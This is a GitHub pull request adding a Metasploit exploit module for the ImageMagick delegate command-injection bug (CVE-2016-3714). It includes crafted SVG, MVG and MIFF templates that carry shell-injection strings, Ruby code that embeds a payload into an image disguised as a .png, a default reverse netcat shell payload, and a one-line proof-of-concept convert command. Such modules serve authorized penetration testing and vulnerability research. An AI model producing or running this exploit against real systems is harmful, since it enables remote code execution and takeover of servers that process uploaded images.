### PR TITLE
Add ImageMagick exploit

### DIFF
--- a/data/exploits/CVE-2016-3714/msf.miff
+++ b/data/exploits/CVE-2016-3714/msf.miff
@@ -9,6 +9,6 @@ red-primary=0.64,0.33  green-primary=0.3,0.6  blue-primary=0.15,0.06
 white-point=0.3127,0.329
 date:create=2016-05-04T00:19:42-05:00
 date:modify=2016-05-04T00:19:42-05:00
-label={";Lorem ipsum"}
+label={";echo vulnerable"}
 
 :ÿÿÿÿÿÿ

--- a/data/exploits/CVE-2016-3714/msf.miff
+++ b/data/exploits/CVE-2016-3714/msf.miff
@@ -1,0 +1,14 @@
+id=ImageMagick  version=1.0
+class=DirectClass  colors=0  matte=False
+columns=1  rows=1  depth=16
+colorspace=sRGB
+page=1x1+0+0
+rendering-intent=Perceptual
+gamma=0.454545
+red-primary=0.64,0.33  green-primary=0.3,0.6  blue-primary=0.15,0.06
+white-point=0.3127,0.329
+date:create=2016-05-04T00:19:42-05:00
+date:modify=2016-05-04T00:19:42-05:00
+label={";Lorem ipsum"}
+
+:ÿÿÿÿÿÿ

--- a/data/exploits/CVE-2016-3714/msf.mvg
+++ b/data/exploits/CVE-2016-3714/msf.mvg
@@ -3,6 +3,6 @@ encoding "UTF-8"
 viewbox 0 0 1 1
 affine 1 0 0 1 0 0
 push graphic-context
-image Over 0,0 1,1 'url(https:";Lorem ipsum")'
+image Over 0,0 1,1 'url(https:";echo vulnerable")'
 pop graphic-context
 pop graphic-context

--- a/data/exploits/CVE-2016-3714/msf.mvg
+++ b/data/exploits/CVE-2016-3714/msf.mvg
@@ -3,6 +3,6 @@ encoding "UTF-8"
 viewbox 0 0 1 1
 affine 1 0 0 1 0 0
 push graphic-context
-image Over 0,0 1,1 'url(https:";echo vulnerable")'
+image Over 0,0 1,1 'url(https://localhost";echo vulnerable")'
 pop graphic-context
 pop graphic-context

--- a/data/exploits/CVE-2016-3714/msf.mvg
+++ b/data/exploits/CVE-2016-3714/msf.mvg
@@ -3,6 +3,6 @@ encoding "UTF-8"
 viewbox 0 0 1 1
 affine 1 0 0 1 0 0
 push graphic-context
-image Over 0,0 1,1 'url(https://localhost";echo vulnerable")'
+image Over 0,0 1,1 'https://localhost";echo vulnerable"'
 pop graphic-context
 pop graphic-context

--- a/data/exploits/CVE-2016-3714/msf.mvg
+++ b/data/exploits/CVE-2016-3714/msf.mvg
@@ -1,0 +1,8 @@
+push graphic-context
+encoding "UTF-8"
+viewbox 0 0 1 1
+affine 1 0 0 1 0 0
+push graphic-context
+image Over 0,0 1,1 'url(https:";Lorem ipsum")'
+pop graphic-context
+pop graphic-context

--- a/data/exploits/CVE-2016-3714/msf.svg
+++ b/data/exploits/CVE-2016-3714/msf.svg
@@ -1,5 +1,5 @@
 <?xml version="1.0" encoding="UTF-8" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve">  <image id="image0" width="1" height="1" x="0" y="0"
-    xlink:href="&#x68;&#x74;&#x74;&#x70;&#x73;&#x3a;&#x22;&#x3b;echo vulnerable&#x22;" />
+    xlink:href="&#x68;&#x74;&#x74;&#x70;&#x73;&#x3a;&#x2f;&#x2f;&#x6c;&#x6f;&#x63;&#x61;&#x6c;&#x68;&#x6f;&#x73;&#x74;&#x22;&#x3b;echo vulnerable&#x22;" />
 </svg>

--- a/data/exploits/CVE-2016-3714/msf.svg
+++ b/data/exploits/CVE-2016-3714/msf.svg
@@ -1,5 +1,5 @@
 <?xml version="1.0" encoding="UTF-8" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve">  <image id="image0" width="1" height="1" x="0" y="0"
-    xlink:href="https:&quot;;echo vulnerable&quot;" />
+    xlink:href="&#x68;&#x74;&#x74;&#x70;&#x73;&#x3a;&#x22;&#x3b;echo vulnerable&#x22;" />
 </svg>

--- a/data/exploits/CVE-2016-3714/msf.svg
+++ b/data/exploits/CVE-2016-3714/msf.svg
@@ -1,5 +1,5 @@
 <?xml version="1.0" encoding="UTF-8" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve">  <image id="image0" width="1" height="1" x="0" y="0"
-    xlink:href="https:&quot;;Lorem ipsum&quot;" />
+    xlink:href="https:&quot;;echo vulnerable&quot;" />
 </svg>

--- a/data/exploits/CVE-2016-3714/msf.svg
+++ b/data/exploits/CVE-2016-3714/msf.svg
@@ -1,0 +1,5 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve">  <image id="image0" width="1" height="1" x="0" y="0"
+    xlink:href="https:&quot;;Lorem ipsum&quot;" />
+</svg>

--- a/modules/exploits/unix/fileformat/imagemagick_delegate.rb
+++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb
@@ -1,0 +1,73 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'ImageMagick Delegate Arbitrary Command Execution',
+      'Description'     => %q{
+        This module exploits a command injection in ImageMagick <= 7.0.1-0.
+      },
+      'Author'          => [
+        'stewie',            # Vulnerability discovery
+        'Nikolay Ermishkin', # Vulnerability discovery
+        'wvu',               # Metasploit module
+        'hdm'                # Metasploit module
+      ],
+      'References'      => [
+        %w{CVE 2016-3714},
+        %w{URL https://imagetragick.com/}
+      ],
+      'DisclosureDate'  => 'May 3 2016',
+      'License'         => MSF_LICENSE,
+      'Platform'        => 'unix',
+      'Arch'            => ARCH_CMD,
+      'Privileged'      => false,
+      'Payload'         => {
+        'BadChars'      => "\x22\x27\x5c", # ", ', and \
+        'Compat'        => {
+          'PayloadType' => 'cmd cmd_bash',
+          'RequiredCmd' => 'generic netcat bash-tcp'
+        }
+      },
+      'Targets'         => [
+        ['SVG file',  template: 'msf.svg'],
+        ['MVG file',  template: 'msf.mvg'],
+        ['MIFF file', template: 'msf.miff']
+      ],
+      'DefaultTarget'   => 0,
+      'DefaultOptions'  => {
+        'DisablePayloadHandler' => false,
+        'WfsDelay'              => 9001
+      }
+    ))
+
+    register_options([
+      OptString.new('FILENAME', [true, 'Output file', 'msf.png'])
+    ])
+  end
+
+  def exploit
+    if target.name == 'SVG file'
+      p = Rex::Text.html_encode(payload.encoded)
+    else
+      p = payload.encoded
+    end
+
+    file_create(template.sub('Lorem ipsum', p))
+  end
+
+  def template
+    File.read(File.join(
+      Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template]
+    ))
+  end
+
+end

--- a/modules/exploits/unix/fileformat/imagemagick_delegate.rb
+++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb
@@ -13,7 +13,15 @@ class MetasploitModule < Msf::Exploit
     super(update_info(info,
       'Name'            => 'ImageMagick Delegate Arbitrary Command Execution',
       'Description'     => %q{
-        This module exploits a command injection in ImageMagick <= 7.0.1-0.
+        This module exploits a shell command injection in the way "delegates"
+        (commands for converting files) are processed in ImageMagick <= 7.0.1-0.
+
+        Since ImageMagick uses file magic to detect file format, you can create
+        a .png (for example) which is actually a crafted SVG (for example) that
+        triggers the command injection.
+
+        Tested on Linux, BSD, and OS X. You'll want to choose your payload
+        carefully due to portability concerns. Use cmd/unix/generic if need be.
       },
       'Author'          => [
         'stewie',            # Vulnerability discovery

--- a/modules/exploits/unix/fileformat/imagemagick_delegate.rb
+++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb
@@ -49,9 +49,9 @@ class MetasploitModule < Msf::Exploit
         }
       },
       'Targets'         => [
-        ['SVG file',  template: 'msf.svg'],
-        ['MVG file',  template: 'msf.mvg'],
-        ['MIFF file', template: 'msf.miff']
+        ['SVG file',  template: 'msf.svg'], # convert msf.png msf.svg
+        ['MVG file',  template: 'msf.mvg'], # convert msf.svg msf.mvg
+        ['MIFF file', template: 'msf.miff'] # convert -label "" msf.svg msf.miff
       ],
       'DefaultTarget'   => 0,
       'DefaultOptions'  => {

--- a/modules/exploits/unix/fileformat/imagemagick_delegate.rb
+++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb
@@ -56,6 +56,7 @@ class MetasploitModule < Msf::Exploit
       'DefaultTarget'   => 0,
       'DefaultOptions'  => {
         'PAYLOAD'               => 'cmd/unix/reverse_netcat',
+        'LHOST'                 => Rex::Socket.source_address,
         'DisablePayloadHandler' => false,
         'WfsDelay'              => 9001
       }

--- a/modules/exploits/unix/fileformat/imagemagick_delegate.rb
+++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb
@@ -55,6 +55,7 @@ class MetasploitModule < Msf::Exploit
       ],
       'DefaultTarget'   => 0,
       'DefaultOptions'  => {
+        'PAYLOAD'               => 'cmd/unix/reverse_netcat',
         'DisablePayloadHandler' => false,
         'WfsDelay'              => 9001
       }

--- a/modules/exploits/unix/fileformat/imagemagick_delegate.rb
+++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit
       p = payload.encoded
     end
 
-    file_create(template.sub('Lorem ipsum', p))
+    file_create(template.sub('echo vulnerable', p))
   end
 
   def template

--- a/modules/exploits/unix/fileformat/imagemagick_delegate.rb
+++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb
@@ -23,7 +23,10 @@ class MetasploitModule < Msf::Exploit
       ],
       'References'      => [
         %w{CVE 2016-3714},
-        %w{URL https://imagetragick.com/}
+        %w{URL https://imagetragick.com/},
+        %w{URL http://seclists.org/oss-sec/2016/q2/205},
+        %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},
+        %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456}
       ],
       'DisclosureDate'  => 'May 3 2016',
       'License'         => MSF_LICENSE,

--- a/modules/exploits/unix/fileformat/imagemagick_delegate.rb
+++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb
@@ -14,7 +14,8 @@ class MetasploitModule < Msf::Exploit
       'Name'            => 'ImageMagick Delegate Arbitrary Command Execution',
       'Description'     => %q{
         This module exploits a shell command injection in the way "delegates"
-        (commands for converting files) are processed in ImageMagick <= 7.0.1-0.
+        (commands for converting files) are processed in ImageMagick versions
+        <= 7.0.1-0 and <= 6.9.3-9 (legacy).
 
         Since ImageMagick uses file magic to detect file format, you can create
         a .png (for example) which is actually a crafted SVG (for example) that


### PR DESCRIPTION
**What is it?**

> ImageMagick® is a software suite to create, edit, compose, or convert bitmap images. It can read and write images in a variety of formats (over 200) including PNG, JPEG, JPEG-2000, GIF, TIFF, DPX, EXR, WebP, Postscript, PDF, and SVG.

Basically, it's magic. With images.

**How does it work?**

https://github.com/ImageMagick/ImageMagick/commit/06c41aba39b97203f6b9a0be6a2ccf8888cddc93
https://github.com/ImageMagick/ImageMagick/commit/a347456a1ef3b900c20402f9866992a17eb5d181

If you read the first commit, you can see an XML file with a list of file formats associated to shell commands...

Since ImageMagick uses file magic to detect file format, you can create a `.png` (for example) which is actually a crafted SVG (for example) that triggers the command injection.

PoC (à la Shellshock): `convert 'https:";echo vulnerable"' - 2>&-`.

**Verification steps:**
- [x] `convert msf.png msf.jpg` to trigger the bug
- [x] Test all payloads against all targets against all supported platforms
- [x] Get a shell in every case that would logically work

_Shoutout to @hdm, @OJ, and @Viss for the great conversation on this bug!_
